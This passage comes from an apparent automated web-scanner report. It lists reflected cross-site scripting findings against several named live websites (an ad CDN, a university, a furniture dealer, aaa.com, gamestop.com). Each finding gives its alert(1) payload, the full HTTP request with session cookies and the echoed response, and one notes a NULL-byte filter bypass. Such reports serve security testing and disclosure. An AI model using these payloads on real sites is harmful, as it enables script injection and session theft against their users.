<form name="frmContact" method="post" action="/contact-us.php?d5afa\"><script>alert(1)</script>c2243c61dfa=1" class="conform" onsubmit="return formCheck(this);">
...[SNIP]...

4.125. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tap-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/page_parser.js

Issue detail

The value of the d request parameter is copied into a JavaScript inline comment. The payload beb61*/alert(1)//5d56143d817 was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/scripts/rubicon/page_parser.js?d=support.gamehouse.combeb61*/alert(1)//5d56143d817 HTTP/1.1
Host: tap-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; khaos=GOVBRMNC-I-DXQD; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; put_2211=2814750682866683; rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
Last-Modified: Tue, 19 Jul 2011 20:26:09 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=3600
Expires: Tue, 19 Jul 2011 21:26:10 GMT
Date: Tue, 19 Jul 2011 20:26:10 GMT
Content-Length: 17453
Connection: close
Vary: Accept-Encoding


/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */


/*
   The requested resource (/oz/scripts/domains/gamehouse.combeb61*/alert(1)//5d56143d817/page_parser_hooks.js) is not available
*/


function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function(
...[SNIP]...

4.126. http://umfcluj.ro/contact.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /contact.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1e92'-alert(1)-'6160d2b7976 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.aspx?d1e92'-alert(1)-'6160d2b7976=1 HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:33:45 GMT
Content-Length: 60489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<script type="text/javascript" language="javascript">
document.getElementById("aspnetForm").action = '/contact.aspx?d1e92'-alert(1)-'6160d2b7976=1';
</script>
...[SNIP]...

4.127. http://waypointlivingspaces.com/locate-dealer [zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /locate-dealer

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29054"><script>alert(1)</script>c4c490e0e79 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /locate-dealer?zip=29054"><script>alert(1)</script>c4c490e0e79 HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:51:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:51:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<input type="text" name="zip" id="zip" title="Enter your zip code or city and state" value="29054"><script>alert(1)</script>c4c490e0e79" />
...[SNIP]...

4.128. http://waypointlivingspaces.com/locate-dealer [zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /locate-dealer

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25749"><script>alert(1)</script>56a38b3928b was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /locate-dealer?zip=1001025749"><script>alert(1)</script>56a38b3928b HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:56:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:56:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<input type="text" name="zip" id="zip" title="Enter your zip code or city and state" value="1001025749"><script>alert(1)</script>56a38b3928b" />
...[SNIP]...

4.129. http://www.aaa.com/ [rurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /

Issue detail

The value of the rurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8ccb"><script>alert(1)</script>7b05fa45749 was submitted in the rurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspxe8ccb"><script>alert(1)</script>7b05fa45749 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response (redirected)

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW3
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:00 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:00 GMT; path=/; domain=aaa.com
content-length: 1409

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspxe8ccb"><script>alert(1)</script>7b05fa45749?zip=05672&referer=www.aaa.com">
...[SNIP]...

4.130. http://www.aaa.com/ [rurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /

Issue detail

The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b429'%3balert(1)//05cb045aa3 was submitted in the rurl parameter. This input was echoed as 8b429';alert(1)//05cb045aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx8b429'%3balert(1)//05cb045aa3 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response (redirected)

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW3
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:08 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:08 GMT; path=/; domain=aaa.com
content-length: 1361

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx8b429';alert(1)//05cb045aa3?zip=05672&
...[SNIP]...
<!--
       window.location.replace('http://www.nne.aaa.com/en-nne/Pages/Home.aspx8b429';alert(1)//05cb045aa3?zip=05672&referer=www.aaa.com');
   // -->
...[SNIP]...

4.131. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /scripts/WebObjects.dll/ZipCode.woa/wa/route

Issue detail

The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 881bf'%3balert(1)//43f8c51a252 was submitted in the rurl parameter. This input was echoed as 881bf';alert(1)//43f8c51a252 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx881bf'%3balert(1)//43f8c51a252 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW1
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:05 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:05 GMT; path=/; domain=aaa.com
content-length: 1364

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx881bf';alert(1)//43f8c51a252?zip=05672
...[SNIP]...
<!--
       window.location.replace('http://www.nne.aaa.com/en-nne/Pages/Home.aspx881bf';alert(1)//43f8c51a252?zip=05672&referer=www.aaa.com');
   // -->
...[SNIP]...

4.132. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /scripts/WebObjects.dll/ZipCode.woa/wa/route

Issue detail

The value of the rurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d9d1"><script>alert(1)</script>99de8810c92 was submitted in the rurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx4d9d1"><script>alert(1)</script>99de8810c92 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW1
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:02 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:02 GMT; path=/; domain=aaa.com
content-length: 1409

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx4d9d1"><script>alert(1)</script>99de8810c92?zip=05672&referer=www.aaa.com">
...[SNIP]...

4.133. http://www.gamestop.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b620'><script>alert(1)</script>14a508ceae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2b620'><script>alert(1)</script>14a508ceae=1 HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Jul 2011 16:02:32 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:32 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,4265,4287,3852,4300,4151,3362,4228,4227,4226,3383; path=/
Set-Cookie: CactusState=V=1; path=/
Content-Length: 317624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Default.aspx?2b620'><script>alert(1)</script>14a508ceae=1' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.134. http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /JavaScript/CertonaTable.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4c2e'%20a%3db%2058959062e85 was submitted in the REST URL parameter 1. This input was echoed as c4c2e' a=b 58959062e85 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JavaScriptc4c2e'%20a%3db%2058959062e85/CertonaTable.htm HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117799
Date: Tue, 19 Jul 2011 16:02:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:35 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/JavaScriptc4c2e' a=b 58959062e85/CertonaTable.htm' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.135. http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /JavaScript/CertonaTable.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 757bf'%20a%3db%2029f44a6dade was submitted in the REST URL parameter 2. This input was echoed as 757bf' a=b 29f44a6dade in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JavaScript/CertonaTable.htm757bf'%20a%3db%2029f44a6dade HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117455
Date: Tue, 19 Jul 2011 16:02:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:37 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/JavaScript/CertonaTable.htm757bf' a=b 29f44a6dade' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.136. http://www.gamestop.com/Recommendations.axd [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /Recommendations.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32a35'%20a%3db%20af794d36cbc was submitted in the REST URL parameter 1. This input was echoed as 32a35' a=b af794d36cbc in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /Recommendations.axd32a35'%20a%3db%20af794d36cbc HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
Content-Length: 122
Origin: http://www.gamestop.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
